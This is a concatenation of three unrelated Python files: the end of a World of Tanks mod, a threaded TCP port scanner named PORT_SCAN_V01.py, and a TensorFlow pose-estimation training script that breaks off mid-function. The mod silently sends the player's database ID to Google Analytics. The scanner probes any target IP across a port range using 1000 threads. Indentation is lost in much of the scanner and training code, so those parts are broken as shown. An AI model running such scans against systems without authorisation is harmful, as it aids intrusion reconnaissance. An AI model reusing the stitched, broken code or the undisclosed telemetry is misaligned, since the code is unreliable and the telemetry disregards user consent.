        if not self.analytics_started:
            player = BigWorld.player()
            param = urllib.urlencode({
                'v' : 1, # Version.
                'tid': '%s' % self.tid, # Tracking ID / Property ID.
                'cid': player.databaseID, # Anonymous Client ID.
                't' : 'screenview', # Screenview hit type.
                'an' : '%s' % self.description_analytics, # App name.
                'av' : '%s %s' % (self.description_analytics, _config.version), # App version.
                'cd' : 'start [%s]' % AUTH_REALM # Screen name / content description.
            })
            urllib2.urlopen(url='http://www.google-analytics.com/collect?', data=param).read()
            self.analytics_started = True
    def start(self):
        # Fire the ping asynchronously so the game thread never blocks on network I/O.
        self._thread_analytics = threading.Thread(target=self.analytics_do, name='Thread')
        self._thread_analytics.start()
# deformed functions:
def hook_after_create(*args):
    """Wrapper for Battle.afterCreate: build the text flash once the window exists."""
    hooked_afterCreate(*args)
    if not _config.data['enabled']:
        return
    battle_window = args[0]
    armor.flash = _TextFlash(battle_window.proxy, battle_window, _config.ids, '')
    armor.cleanup_battle_data()
def hook_before_delete(*args):
    """Wrapper for Battle.beforeDelete: tear down the flash UI and reset counters."""
    hooked_beforeDelete(*args)
    if not _config.data['enabled']:
        return
    armor.cleanup_battle_data()
    if armor.flash:
        armor.flash.destroy()
        armor.flash = None
def hook_vehicle_show_damage_from_shot(*args):
    """Wrapper for Vehicle.showDamageFromShot: forward each shot to the counter."""
    # original signature: (self, attackerID, points, effectsIndex, damageFactor)
    hooked_vehicle_show_damage_from_shot(*args)
    if armor.on_off:
        vehicle, attacker_id, points, effects_index = args[0], args[1], args[2], args[3]
        armor.shot(vehicle, attacker_id, points, effects_index)
def hook_vehicle_on_health_changed(*args):
    """Wrapper for Vehicle.onHealthChanged: forward health changes to the counter."""
    # original signature: (self, newHealth, attackerID, attackReasonID)
    hooked_vehicle_on_health_changed(*args)
    if armor.on_off:
        vehicle, new_health, attacker_id = args[0], args[1], args[2]
        armor.heal(vehicle, new_health, attacker_id)
def hook_minimap_start(*args):
    """Wrapper for Minimap.start: activate the mod when the battle begins."""
    hooked_minimap_start(*args)
    armor.start_battle()
def hook_update_all(*args):
    """Wrapper for LobbyView._populate: kick off the analytics ping, best-effort."""
    hooked_update_all(*args)
    try:
        stat.start()
    except Exception as e:
        # analytics failures must never break the lobby
        print('hook_update_all get stat', e)
#start mod
stat = Statistics()
_gui_config = _GUIConfig()
_config = _Config()
armor = ArmoringExtended()
_config.load()
#hooked
# Keep references to the original implementations so the wrappers above can delegate.
# noinspection PyProtectedMember
hooked_update_all = LobbyView._populate
hooked_afterCreate = Battle.afterCreate
hooked_beforeDelete = Battle.beforeDelete
# noinspection PyProtectedMember
hooked_vehicle_show_damage_from_shot = Vehicle.showDamageFromShot
hooked_vehicle_on_health_changed = Vehicle.onHealthChanged
hooked_minimap_start = Minimap.Minimap.start
#hook
# Monkey-patch the game classes with the wrapper functions defined above.
LobbyView._populate = hook_update_all
Battle.afterCreate = hook_after_create
Battle.beforeDelete = hook_before_delete
# noinspection PyProtectedMember
Vehicle.showDamageFromShot = hook_vehicle_show_damage_from_shot
Vehicle.onHealthChanged = hook_vehicle_on_health_changed
Minimap.Minimap.start = hook_minimap_start
|
PORT_SCAN_V01.py | #import modules
import sys
import socket
import time
import threading
from queue import Queue
########################
#Time Set
time1 = time.time()  # scan start timestamp, used for the final duration report
########################
#Auto Connect Close
socket.setdefaulttimeout(1)  # 1s timeout so closed/filtered ports fail fast
lock = threading.Lock()  # serializes print output from the worker threads
##################################
#User Guide Print
user_guide = 'Python3 PORT_SCAN.py Target_IP Starting_Port Ending_Port\n'
example = 'Example: Python3 PORT_SCAN.py 191.121.13.30 1 100'
###########################################################################
#Argument Check: exactly three arguments are required
if(len(sys.argv)!=4):
    print(user_guide)
    print(example)
    sys.exit()
############################################################################
#Target Input: resolve host name / validate IP
try:
    target = socket.gethostbyname(sys.argv[1])
except socket.gaierror:
    print("Name Resulation Error!")
    sys.exit()
#############################################################################
#Input Start And End Port (inclusive range)
start_port = int(sys.argv[2])
end_port = int(sys.argv[3])
###########################################################################################################
#Printing Some Information
print("*"*80)
print("Start Scanning Target: {}.##########CREATED BY########################".format(target))
tport = (end_port - start_port)+1
print("Target Total {} Port.##########################SHAWON##########################".format(tport))
print("*"*80)
##############################################################################################################
def scanning(port):
connections = socket.socket(socket.AF_INET , socket.SOCK_STREAM)
try:
connect = connections.connect((target,port))
with lock:
print("Port {} Is Open".format(port))
connections.close()
except:
pass
#################################################################################################################
#Boosting Scan
q = Queue()  # work queue feeding port numbers to the scanner threads
def threat():
    # Worker loop: pull a port from the queue, scan it, mark the task done.
    # Runs forever; the threads are daemonic so they die with the main thread.
    while True:
        get1 = q.get()
        scanning(get1)
        q.task_done()
# spawn a fixed pool of 1000 daemon worker threads
for i in range(1000):
    th = threading.Thread(target = threat)
    th.daemon = True
    th.start()
# enqueue every port in the requested (inclusive) range
for pt in range(start_port,end_port+1):
    q.put(pt)
q.join()  # block until every queued port has been processed
##################################################################################################################
#Execution time taken
end_time = time.time()
print("Time Estemeted: " + str(end_time - time1) + " Sec\n")
#Complete
|
train.py | # --------------------------------------------------------
# FCN
# Copyright (c) 2016 RSE at UW
# Licensed under The MIT License [see LICENSE for details]
# Written by Yu Xiang
# --------------------------------------------------------
"""Train a FCN"""
from fcn.config import cfg
from gt_data_layer.layer import GtDataLayer
from gt_single_data_layer.layer import GtSingleDataLayer
from gt_synthesize_layer.layer import GtSynthesizeLayer
from utils.timer import Timer
import numpy as np
import os
import tensorflow as tf
from tensorflow.python.framework.errors_impl import NotFoundError
import threading
from tools.common import smooth_l1_loss_vertex, combine_poses
from fcn.test import _extract_vertmap, plot_data
from generate_dataset.common import get_intrinsic_matrix
import io
import matplotlib.pyplot as plt
class Coordinator:
    """Shared run flag: worker threads keep looping while `Coordinator.run` is True."""

    # class attribute so every consumer observes updates made via Coordinator.run
    run = True
class SolverWrapper(object):
"""A simple wrapper around Caffe's solver.
This wrapper gives us control over the snapshotting process, which we
use to unnormalize the learned bounding-box regression weights.
"""
def __init__(self, sess, network, imdb, roidb, output_dir, pretrained_model=None, pretrained_ckpt=None):
    """Initialize the SolverWrapper.

    network: the FCN network object being trained
    imdb / roidb: dataset object and its region-of-interest database
    output_dir: directory snapshots are written to
    pretrained_model / pretrained_ckpt: optional initial weights
    (sess is not stored here - presumably used by the caller; confirm)
    """
    self.net = network
    self.imdb = imdb
    self.roidb = roidb
    self.output_dir = output_dir
    self.pretrained_model = pretrained_model
    self.pretrained_ckpt = pretrained_ckpt
    # For checkpoint
    # self.saver = tf.train.Saver(tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES), max_to_keep=12)
    self.saver = tf.train.Saver()
def snapshot(self, sess, iter, epoch=0):
    """Take a snapshot of the network after unnormalizing the learned
    bounding-box regression weights. This enables easy use at test-time.

    The checkpoint name encodes the (1-based) iteration and epoch.
    """
    if not os.path.exists(self.output_dir):
        os.makedirs(self.output_dir)
    infix = ('_' + cfg.TRAIN.SNAPSHOT_INFIX
             if cfg.TRAIN.SNAPSHOT_INFIX != '' else '')
    filename = (cfg.TRAIN.SNAPSHOT_PREFIX + infix + '_iter_{:d}_epoch_{:d}'.format(iter + 1, epoch + 1) + '.ckpt')
    filename = os.path.join(self.output_dir, filename)
    # self.saver.save(sess, filename, write_meta_graph=False)
    self.saver.save(sess, filename)
    print 'Wrote snapshot to: {:s}'.format(filename)
def restore(self, session, save_file):
try:
reader = tf.train.NewCheckpointReader(save_file)
saved_shapes = reader.get_variable_to_shape_map()
var_names = sorted([(var.name, var.name.split(':')[0]) for var in tf.global_variables()
if var.name.split(':')[0] in saved_shapes])
var_name_to_var = {var.name: var for var in tf.global_variables()}
restore_vars = []
restored_var_names = set()
print('Restoring:')
with tf.variable_scope(tf.get_variable_scope(), reuse=True):
for var_name, saved_var_name in var_names:
if 'global_step' in var_name:
continue
if 'Variable' in var_name:
continue
curr_var = var_name_to_var[var_name]
var_shape = curr_var.get_shape().as_list()
if var_shape == saved_shapes[saved_var_name]:
restore_vars.append(curr_var)
print(str(saved_var_name))
restored_var_names.add(saved_var_name)
else:
print('Shape mismatch for var', saved_var_name, 'expected', var_shape, 'got', saved_shapes[saved_var_name])
ignored_var_names = sorted(list(set(saved_shapes.keys()) - restored_var_names))
if len(ignored_var_names) == 0:
print('Restored all variables')
else:
print('Did not restore:' + '\n\t'.join(ignored_var_names))
if len(restore_vars) > 0:
print("In saver restore PoseCNN")
saver = tf.train.Saver(restore_vars)
saver.restore(session, save_file)
print('Restored %s' % save_file)
except NotFoundError as e:
print("Exception in restore")
print(e)
def train_model(self, sess, train_op, loss, loss_cls, loss_regu, learning_rate, iters_train, iters_val, data_layer):
"""Network training loop."""
# add summary
loss_op = tf.summary.scalar('loss', tf.squeeze(loss))
loss_cls_op = tf.summary.scalar('loss_cls', tf.squeeze(loss_cls))
loss_placeholder = tf.placeholder(tf.float32, shape=())
loss_cls_placeholder = tf.placeholder(tf.float32, shape=())
loss_val_op = tf.summary.scalar('loss_val', loss_placeholder)
loss_cls_val_op = tf.summary.scalar('loss_cls_val', loss_cls_placeholder)
train_writer = tf.summary.FileWriter(self.output_dir + "/train", sess.graph)
val_writer = tf.summary.FileWriter(self.output_dir + "/val", sess.graph)
img_str_placeholder = tf.placeholder(tf.string)
image = tf.image.decode_png(img_str_placeholder, channels=4)
# Add the batch dimension
image_expanded = tf.expand_dims(image, 0)
# Add image summary
img_op = tf.summary.image("Val predictions", image_expanded)
coord_train = Coordinator()
coord_val = Coordinator()
if self.pretrained_ckpt is None:
sess.run(tf.global_variables_initializer())
if self.pretrained_model is not None:
print ('Loading pretrained model '
'weights from {:s}').format(self.pretrained_model)
self.net.load(self.pretrained_model, sess, True)
else:
print ('Loading pretrained ckpt '
'weights from {:s}').format(self.pretrained_ckpt)
self.saver.restore(sess, self.pretrained_ckpt)
#self.restore(sess, self.pretrained_ckpt)
tf.get_default_graph().finalize()
tf.train.write_graph(sess.graph_def, self.output_dir, 'model.pbtxt')
last_snapshot_iter = -1
timer = Timer()
epochs = 5
intrinsic_matrix = get_intrinsic_matrix()
for epoch in range(epochs):
coord_train.run = True
coord_val.run = True
q_size = sess.run(self.net.q_size)
print("Queue size", q_size)
t = threading.Thread(target=load_and_enqueue, args=(sess, self.net, data_layer, coord_train, iters_train))
t.start()
t_val = threading.Thread(target=load_and_enqueue_val, args=(sess, self.net, data_layer, coord_val, iters_val))
print("Epoch: %d / %d" % (epoch, epochs))
for iter_train in range(iters_train):
timer.tic()
loss_summary, loss_cls_summary, loss_value, loss_cls_value, loss_regu_value, lr, _ = sess.run([loss_op, loss_cls_op, loss, loss_cls, loss_regu, learning_rate, train_op])
current_iter = iters_train * epoch + iter_train
train_writer.add_summary(loss_summary, current_iter)
train_writer.add_summary(loss_cls_summary, current_iter)
#starter_learning_rate = cfg.TRAIN.LEARNING_RATE
#lr = sess.run(clr.cyclic_learning_rate(global_step=iters_train * epoch + iter_train, learning_rate=starter_learning_rate, max_lr=starter_learning_rate*10,
# step_size=2, mode='triangular2', gamma=0.99994))
timer.toc()
print 'iter: %d / %d, loss: %.4f, loss_cls: %.4f, lr: %.8f, time: %.2f' % \
(iter_train + 1, iters_train, loss_value, loss_cls_value, lr, timer.diff)
if (iter_train + 1) % (10 * cfg.TRAIN.DISPLAY) == 0:
print 'speed: {:.3f}s / iter'.format(timer.average_time)
coord_train.run = False
q_size = sess.run(self.net.q_size)
print("Queue size", q_size)
t.join()
t_val.start()
for var in tf.global_variables():
result = sess.run(var)
np.save(var.name.replace("/", "_").replace(":", "_"), result)
self.snapshot(sess, iter_train, epoch)
losses_val = []
losses_cls_val = []
visualize_n_per_validation = 10.0
for iter_val in range(iters_val):
timer.tic()
if iter_val % round(iters_val / visualize_n_per_validation) == 0:
data, labels_2d, probs, loss_value, loss_cls_value, loss_regu_value, lr = \
sess.run([self.net.get_output('data'), self.net.get_output('label_2d'), self.net.get_output('prob_normalized'), loss, loss_cls, loss_regu, learning_rate])
#data, labels, probs, vertex_pred, rois, poses = combine_poses(data, rois, poses_init, poses_pred, probs, vertex_pred, labels_2d)
#im_label = imdb.labels_to_image(data, labels)
#vertmap = _extract_vertmap(labels, vertex_pred, imdb._extents, imdb.num_classes)
#plot_data(data, None, im_label, imdb._class_colors, vertmap, labels, rois, poses, [], intrinsic_matrix, imdb.num_classes, imdb._classes, imdb._points_all)
# more details at: https://stackoverflow.com/questions/38543850/tensorflow-how-to-display-custom-images-in-tensorboard-e-g-matplotlib-plots
#buf = io.BytesIO()
#plt.savefig(buf, format='png', dpi=500)
#buf.seek(0)
#img_summary = sess.run(img_op, feed_dict={img_str_placeholder: buf.getvalue()})
#current_iter = iters_train * (epoch + 1) + iter_val
#val_writer.add_summary(img_summary, current_iter)
#plt.close("all")
else:
loss_value, loss_cls_value, loss_regu_value, lr = sess.run([loss, loss_cls, loss_regu, learning_rate])
losses_val.append(loss_value)
losses_cls_val.append(loss_cls_value)
loss_val_summary = sess.run(loss_val_op, feed_dict={loss_placeholder: loss_value})
loss_cls_val_summary = sess.run(loss_cls_val_op, feed_dict={loss_cls_placeholder: loss_cls_value})
current_iter = iters_val * (epoch + 1) + iter_val
val_writer.add_summary(loss_val_summary, current_iter)
val_writer.add_summary(loss_cls_val_summary, current_iter)
timer.toc()
print 'iter: %d / %d, loss: %.4f, loss_cls: %.4f, lr: %.8f, time: %.2f' % \
(iter_val + 1, iters_val, loss_value, loss_cls_value, lr,
timer.diff)
if (iter_val + 1) % (10 * cfg.TRAIN.DISPLAY) == 0:
print 'speed: {:.3f}s / iter'.format(timer.average_time)
coord_val.run = False
q_size = sess.run(self.net.q_size)
print("Queue size", q_size)
t_val.join()
#loss_val_summary = sess.run(loss_val_op, feed_dict={loss_placeholder: np.mean(losses_val)})
#loss_cls_val_summary = sess.run(loss_cls_val_op, feed_dict={loss_cls_placeholder: np.mean(losses_cls_val)})
#current_iter = iters_train * (epoch + 1)
#val_writer.add_summary(loss_val_summary, current_iter)
#val_writer.add_summary(loss_cls_val_summary, current_iter)
sess.run(self.net.close_queue_op)
def train_model_vertex(self, sess, train_op, loss, loss_cls, loss_vertex, loss_regu, learning_rate, max_iters, data_layer):
"""Network training loop."""
# add summary
# tf.summary.scalar('loss', loss)
# merged = tf.summary.merge_all()
# train_writer = tf.summary.FileWriter(self.output_dir, sess.graph)
# intialize variables
sess.run(tf.global_variables_initializer())
if self.pretrained_model is not None:
print ('Loading pretrained model '
'weights from {:s}').format(self.pretrained_model)
self.net.load(self.pretrained_model, sess, True)
if self.pretrained_ckpt is not None:
print ('Loading pretrained ckpt '
'weights from {:s}').format(self.pretrained_ckpt)
self.restore(sess, self.pretrained_ckpt)
tf.get_default_graph().finalize()
coord = tf.train.Coordinator()
if cfg.TRAIN.VISUALIZE:
load_and_enqueue(sess, self.net, data_layer, coord)
else:
t = threading.Thread(target=load_and_enqueue, args=(sess, self.net, data_layer, coord))
t.start()
last_snapshot_iter = -1
timer = Timer()
for iter in range(max_iters):
timer.tic()
loss_value, loss_cls_value, loss_vertex_value, loss_regu_value, lr, _ = sess.run([loss, loss_cls, loss_vertex, loss_regu, learning_rate, train_op])
# train_writer.add_summary(summary, iter)
timer.toc()
print 'iter: %d / %d, loss: %.4f, loss_cls: %.4f, loss_vertex: %.4f, loss_regu: %.12f, lr: %.8f, time: %.2f' % \
(iter + 1, max_iters, loss_value, loss_cls_value, loss_vertex_value, loss_regu_value, lr, timer.diff)
if (iter + 1) % (10 * cfg.TRAIN.DISPLAY) == 0:
print 'speed: {:.3f}s / iter'.format(timer.average_time)
if (iter + 1) % cfg.TRAIN.SNAPSHOT_ITERS == 0:
last_snapshot_iter = iter
self.snapshot(sess, iter)
if last_snapshot_iter != iter:
self.snapshot(sess, iter)
sess.run(self.net.close_queue_op)
coord.request_stop()
coord.join([t])
def train_model_vertex_pose(self, sess, train_op, loss, loss_cls, loss_vertex, loss_pose, loss_regu, learning_rate, iters_train, iters_val, data_layer, imdb):
"""Network training loop."""
# add summary
loss_op = tf.summary.scalar('loss', tf.squeeze(loss))
loss_cls_op = tf.summary.scalar('loss_cls', tf.squeeze(loss_cls))
loss_vertex_op = tf.summary.scalar('loss_vertex', tf.squeeze(loss_vertex))
loss_pose_op = tf.summary.scalar('loss_pose', tf.squeeze(loss_pose))
scalar_placeholder = tf.placeholder(tf.float32, shape=())
lr_op = tf.summary.scalar('lr', scalar_placeholder)
loss_val_op = tf.summary.scalar('loss_val', scalar_placeholder)
loss_cls_val_op = tf.summary.scalar('loss_cls_val', scalar_placeholder)
loss_vertex_val_op = tf.summary.scalar('loss_vertex_val', scalar_placeholder)
loss_pose_val_op = tf.summary.scalar('loss_pose_val', scalar_placeholder)
loss_val_mean_op = tf.summary.scalar('loss_val_mean', scalar_placeholder)
loss_cls_val_mean_op = tf.summary.scalar('loss_cls_val_mean', scalar_placeholder)
loss_vertex_val_mean_op = tf.summary.scalar('loss_vertex_val_mean', scalar_placeholder)
loss_pose_val_mean_op = tf.summary.scalar('loss_pose_val_mean', scalar_placeholder)
train_writer = tf.summary.FileWriter(self.output_dir + "/train", sess.graph)
val_writer = tf.summary.FileWriter(self.output_dir + "/val", sess.graph)
img_str_placeholder = tf.placeholder(tf.string)
image = tf.image.decode_png(img_str_placeholder, channels=4)
# Add the batch dimension
image_expanded = tf.expand_dims(image, 0)
# Add image summary
img_op = tf.summary.image("Val predictions", image_expanded)
coord_train = Coordinator()
coord_val = Coordinator()
if self.pretrained_ckpt is None:
sess.run(tf.global_variables_initializer())
if self.pretrained_model is not None:
print ('Loading pretrained model '
'weights from {:s}').format(self.pretrained_model)
self.net.load(self.pretrained_model, sess, True)
else:
print ('Loading pretrained ckpt '
'weights from {:s}').format(self.pretrained_ckpt)
self.saver.restore(sess, self.pretrained_ckpt)
tf.get_default_graph().finalize()
tf.train.write_graph(sess.graph_def, self.output_dir, 'model.pbtxt')
last_snapshot_iter = -1
timer = Timer()
epochs = 5
intrinsic_matrix = get_intrinsic_matrix()
for epoch in range(epochs):
coord_train.run = True
coord_val.run = True
t = threading.Thread(target=load_and_enqueue, args=(sess, self.net, data_layer, coord_train, iters_train))
t.start()
t_val = threading.Thread(target=load_and_enqueue_val, args=(sess, self.net, data_layer, coord_val, iters_val))
print("Epoch: %d / %d" % (epoch, epochs))
for iter_train in range(iters_train):
timer.tic()
loss_summary, loss_cls_summary, loss_vertex_summary, loss_pose_summary, loss_value, loss_cls_value, loss_vertex_value, \
loss_pose_value, loss_regu_value, lr, _ = sess.run([loss_op, loss_cls_op, loss_vertex_op, loss_pose_op, loss, loss_cls, \
loss_vertex, loss_pose, loss_regu, learning_rate, train_op])
current_iter = iters_train * epoch + iter_train
train_writer.add_summary(loss_summary, current_iter)
train_writer.add_summary(loss_cls_summary, current_iter)
train_writer.add_summary(loss_vertex_summary, current_iter)
train_writer.add_summary(loss_pose_summary, current_iter)
lr_summary = sess.run(lr_op, feed_dict={scalar_placeholder: lr})
train_writer.add_summary(lr_summary, current_iter)
#starter_learning_rate = cfg.TRAIN.LEARNING_RATE
#lr = sess.run(clr.cyclic_learning_rate(global_step=iters_train * epoch + iter_train, learning_rate=starter_learning_rate, max_lr=starter_learning_rate*10,
# step_size=2, mode='triangular2', gamma=0.99994))
timer.toc()
print 'iter: %d / %d, loss: %.4f, loss_cls: %.4f, loss_vertex: %.4f, loss_pose: %.4f, lr: %.8f, time: %.2f' % \
(iter_train + 1, iters_train, loss_value, loss_cls_value, loss_vertex_value, loss_pose_value, lr, timer.diff)
if (iter_train + 1) % (10 * cfg.TRAIN.DISPLAY) == 0:
print 'speed: {:.3f}s / iter'.format(timer.average_time)
coord_train.run = False
q_size = sess.run(self.net.q_size)
print("Queue size", q_size)
t.join()
t_val.start()
if iters_train > 0:
self.snapshot(sess, iter_train, epoch)
losses_val = []
losses_cls_val = []
losses_vertex_val = []
losses_pose_val = []
visualize_n_per_validation = 10.0
for iter_val in range(iters_val):
timer.tic()
if iter_val % round(iters_val / visualize_n_per_validation) == 0:
data, labels_2d, probs, vertex_pred, rois, poses_init, poses_pred, loss_value, loss_cls_value, loss_vertex_value, loss_pose_value, loss_regu_value, lr = \
sess.run([self.net.get_output('data'), self.net.get_output('label_2d'), self.net.get_output('prob_normalized'), self.net.get_output('vertex_pred'), \
self.net.get_output('rois'), self.net.get_output('poses_init'), self.net.get_output('poses_tanh'), loss, loss_cls, loss_vertex, loss_pose, loss_regu, learning_rate])
data, labels, probs, vertex_pred, rois, poses = combine_poses(data, rois, poses_init, poses_pred, probs, vertex_pred, labels_2d)
im_label = imdb.labels_to_image(data, labels)
vertmap = _extract_vertmap(labels, vertex_pred, imdb._extents, imdb.num_classes)
plot_data(data, None, im_label, imdb._class_colors, vertmap, labels, rois, poses, [], intrinsic_matrix, imdb.num_classes, imdb._classes, imdb._points_all)
# more details at: https://stackoverflow.com/questions/38543850/tensorflow-how-to-display-custom-images-in-tensorboard-e-g-matplotlib-plots
buf = io.BytesIO()
plt.savefig(buf, format='png', dpi=500)
buf.seek(0)
img_summary = sess.run(img_op, feed_dict={img_str_placeholder: buf.getvalue()})
current_iter = iters_train * (epoch + 1) + iter_val
val_writer.add_summary(img_summary, current_iter)
plt.close("all")
else:
loss_value, loss_cls_value, loss_vertex_value, loss_pose_value, loss_regu_value, lr = sess.run([loss, loss_cls, loss_vertex, loss_pose, loss_regu, learning_rate])
losses_val.append(loss_value)
losses_cls_val.append(loss_cls_value)
losses_vertex_val.append(loss_vertex_value)
losses_pose_val.append(loss_pose_value)
loss_val_summary = sess.run(loss_val_op, feed_dict={scalar_placeholder: loss_value[0]})
loss_cls_val_summary = sess.run(loss_cls_val_op, feed_dict={scalar_placeholder: loss_cls_value})
loss_vertex_val_summary = sess.run(loss_vertex_val_op, feed_dict={scalar_placeholder: loss_vertex_value})
loss_pose_val_summary = sess.run(loss_pose_val_op, feed_dict={scalar_placeholder: loss_pose_value[0]})
#current_iter = 796 * (epoch + 1) + iter_val + 1
current_iter = iters_train * (epoch + 1) + iter_val
#current_iter = iter_val
val_writer.add_summary(loss_val_summary, current_iter)
val_writer.add_summary(loss_cls_val_summary, current_iter)
val_writer.add_summary(loss_vertex_val_summary, current_iter)
val_writer.add_summary(loss_pose_val_summary, current_iter)
timer.toc()
print 'iter: %d / %d, loss: %.4f, loss_cls: %.4f, loss_vertex: %.4f, loss_pose: %.4f, lr: %.8f, time: %.2f' % \
(iter_val + 1, iters_val, loss_value, loss_cls_value, loss_vertex_value, loss_pose_value, lr,
timer.diff)
if (iter_val + 1) % (10 * cfg.TRAIN.DISPLAY) == 0:
print 'speed: {:.3f}s / iter'.format(timer.average_time)
loss_val_summary = sess.run(loss_val_mean_op, feed_dict={scalar_placeholder: np.mean(losses_val)})
loss_cls_val_summary = sess.run(loss_cls_val_mean_op, feed_dict={scalar_placeholder: np.mean(losses_cls_val)})
loss_vertex_val_summary = sess.run(loss_vertex_val_mean_op, feed_dict={scalar_placeholder: np.mean(losses_vertex_val)})
loss_pose_val_summary = sess.run(loss_pose_val_mean_op, feed_dict={scalar_placeholder: np.mean(losses_pose_val)})
val_writer.add_summary(loss_val_summary, current_iter)
val_writer.add_summary(loss_cls_val_summary, current_iter)
val_writer.add_summary(loss_vertex_val_summary, current_iter)
val_writer.add_summary(loss_pose_val_summary, current_iter)
coord_val.run = False
q_size = sess.run(self.net.q_size)
print("Queue size", q_size)
t_val.join()
sess.run(self.net.close_queue_op)
def train_model_vertex_pose_adapt(self, sess, train_op, loss, loss_cls, loss_vertex, loss_pose, \
loss_domain, label_domain, domain_label, learning_rate, max_iters, data_layer):
"""Network training loop."""
coord = tf.train.Coordinator()
if cfg.TRAIN.VISUALIZE:
load_and_enqueue(sess, self.net, data_layer, coord)
else:
t = threading.Thread(target=load_and_enqueue, args=(sess, self.net, data_layer, coord))
t.start()
# intialize variables
sess.run(tf.global_variables_initializer())
if self.pretrained_model is not None:
print ('Loading pretrained model '
'weights from {:s}').format(self.pretrained_model)
self.net.load(self.pretrained_model, sess, True)
if self.pretrained_ckpt is not None:
print ('Loading pretrained ckpt '
'weights from {:s}').format(self.pretrained_ckpt)
self.restore(sess, self.pretrained_ckpt)
tf.get_default_graph().finalize()
last_snapshot_iter = -1
timer = Timer()
for iter in range(max_iters):
timer.tic()
loss_value, loss_cls_value, loss_vertex_value, loss_pose_value, loss_domain_value, label_domain_value, domain_label_value, lr, _ = sess.run(
[loss, loss_cls, loss_vertex, loss_pose, loss_domain, label_domain, domain_label, learning_rate, train_op])
# train_writer.add_summary(summary, iter)
timer.toc()
print 'iter: %d / %d, loss: %.4f, loss_cls: %.4f, loss_vertex: %.4f, loss_pose: %.4f, loss_domain: %.4f, lr: %.8f, time: %.2f' % \
(iter + 1, max_iters, loss_value, loss_cls_value, loss_vertex_value, loss_pose_value, loss_domain_value, lr, timer.diff)
print label_domain_value
print domain_label_value
if (iter + 1) % (10 * cfg.TRAIN.DISPLAY) == 0:
print 'speed: {:.3f}s / iter'.format(timer.average_time)
if (iter + 1) % cfg.TRAIN.SNAPSHOT_ITERS == 0:
last_snapshot_iter = iter
self.snapshot(sess, iter)
if last_snapshot_iter != iter:
self.snapshot(sess, iter)
sess.run(self.net.close_queue_op)
coord.request_stop()
coord.join([t])
def train_model_det(self, sess, train_op, loss, loss_rpn_cls, loss_rpn_box, loss_cls, loss_box, loss_pose, learning_rate, max_iters, data_layer):
"""Network training loop."""
# add summary
# tf.summary.scalar('loss', loss)
# merged = tf.summary.merge_all()
# train_writer = tf.summary.FileWriter(self.output_dir, sess.graph)
# intialize variables
sess.run(tf.global_variables_initializer())
if self.pretrained_model is not None:
print ('Loading pretrained model '
'weights from {:s}').format(self.pretrained_model)
self.net.load(self.pretrained_model, sess, True)
if self.pretrained_ckpt is not None:
print ('Loading pretrained ckpt '
'weights from {:s}').format(self.pretrained_ckpt)
self.restore(sess, self.pretrained_ckpt)
tf.get_default_graph().finalize()
coord = tf.train.Coordinator()
if cfg.TRAIN.VISUALIZE:
load_and_enqueue(sess, self.net, data_layer, coord)
else:
t = threading.Thread(target=load_and_enqueue, args=(sess, self.net, data_layer, coord))
t.start()
last_snapshot_iter = -1
timer = Timer()
for iter in range(max_iters):
timer.tic()
loss_value, loss_rpn_cls_value, loss_rpn_box_value, loss_cls_value, loss_box_value, loss_pose_value, lr, _ \
= sess.run([loss, loss_rpn_cls, loss_rpn_box, loss_cls, loss_box, loss_pose, learning_rate, train_op])
# train_writer.add_summary(summary, iter)
timer.toc()
print 'iter: %d / %d, loss: %.4f, loss_rpn_cls: %.4f, loss_rpn_box: %.4f, loss_cls: %.4f, loss_box: %.4f, loss_pose: %.4f, lr: %.8f, time: %.2f' % \
(iter + 1, max_iters, loss_value, loss_rpn_cls_value, loss_rpn_box_value, loss_cls_value, loss_box_value, loss_pose_value, lr, timer.diff)
if (iter + 1) % (10 * cfg.TRAIN.DISPLAY) == 0:
print 'speed: {:.3f}s / iter'.format(timer.average_time)
if (iter + 1) % cfg.TRAIN.SNAPSHOT_ITERS == 0:
last_snapshot_iter = iter
self.snapshot(sess, iter)
if last_snapshot_iter != iter:
self.snapshot(sess, iter)
sess.run(self.net.close_queue_op)
coord.request_stop()
coord.join([t])
def get_training_roidb(imdb):
"""Returns a roidb (Region of Interest database) for use in training."""
if cfg.TRAIN.USE_FLIPPED:
print 'Appending horizontally-flipped training examples...'
imdb.append_flipped_images()
print 'done'
return imdb.roidb
def get_val_roidb(imdb):
"""Returns a roidb (Region of Interest database) for use in training."""
if cfg.TRAIN.USE_FLIPPED:
print 'Appending horizontally-flipped training examples...'
imdb.append_flipped_images()
print 'done'
return imdb.roidb_val
def load_and_enqueue_val(sess, net, data_layer, coord, iters=0):
    # Producer loop for validation: pulls minibatch blobs from the shared
    # data layer and feeds them into the network's input queue until
    # `coord.run` is cleared or `iters` minibatches have been enqueued.
    # NOTE(review): with the default iters=0 the loop body never executes;
    # callers are expected to pass the number of validation iterations.
    iter = 0
    # Switch the shared data layer to its validation split.
    data_layer._validation = True
    while coord.run and iter < iters:
        blobs = data_layer.forward(iter)
        # blobs = data_layer.forward()
        iter += 1

        # Select the input image blob(s) according to the configured modality.
        if cfg.INPUT == 'RGBD':
            data_blob = blobs['data_image_color']
            data_p_blob = blobs['data_image_depth']
        elif cfg.INPUT == 'COLOR':
            data_blob = blobs['data_image_color']
        elif cfg.INPUT == 'DEPTH':
            data_blob = blobs['data_image_depth']
        elif cfg.INPUT == 'NORMAL':
            data_blob = blobs['data_image_normal']

        # No dropout during validation (compare 0.5 in load_and_enqueue).
        keep_prob = 1.0
        # Build the feed_dict for the configured task: single-frame
        # segmentation (with/without vertex regression), detection, or the
        # multi-frame path.
        if cfg.TRAIN.SINGLE_FRAME:
            if cfg.TRAIN.SEGMENTATION:
                if cfg.INPUT == 'RGBD':
                    if cfg.TRAIN.VERTEX_REG_2D or cfg.TRAIN.VERTEX_REG_3D:
                        feed_dict = {net.data: data_blob, net.data_p: data_p_blob, net.gt_label_2d: blobs['data_label'], net.keep_prob: keep_prob, \
                                     net.vertex_targets: blobs['data_vertex_targets'], net.vertex_weights: blobs['data_vertex_weights'], \
                                     net.poses: blobs['data_pose'], net.extents: blobs['data_extents'], net.meta_data: blobs['data_meta_data'], \
                                     net.points: blobs['data_points'], net.symmetry: blobs['data_symmetry']}
                    else:
                        feed_dict = {net.data: data_blob, net.data_p: data_p_blob, net.gt_label_2d: blobs['data_label'], net.keep_prob: keep_prob}
                else:
                    if cfg.TRAIN.VERTEX_REG_2D or cfg.TRAIN.VERTEX_REG_3D:
                        # is_train=False marks these batches as validation.
                        feed_dict = {net.data: data_blob, net.gt_label_2d: blobs['data_label'], net.keep_prob: keep_prob, net.is_train: False, \
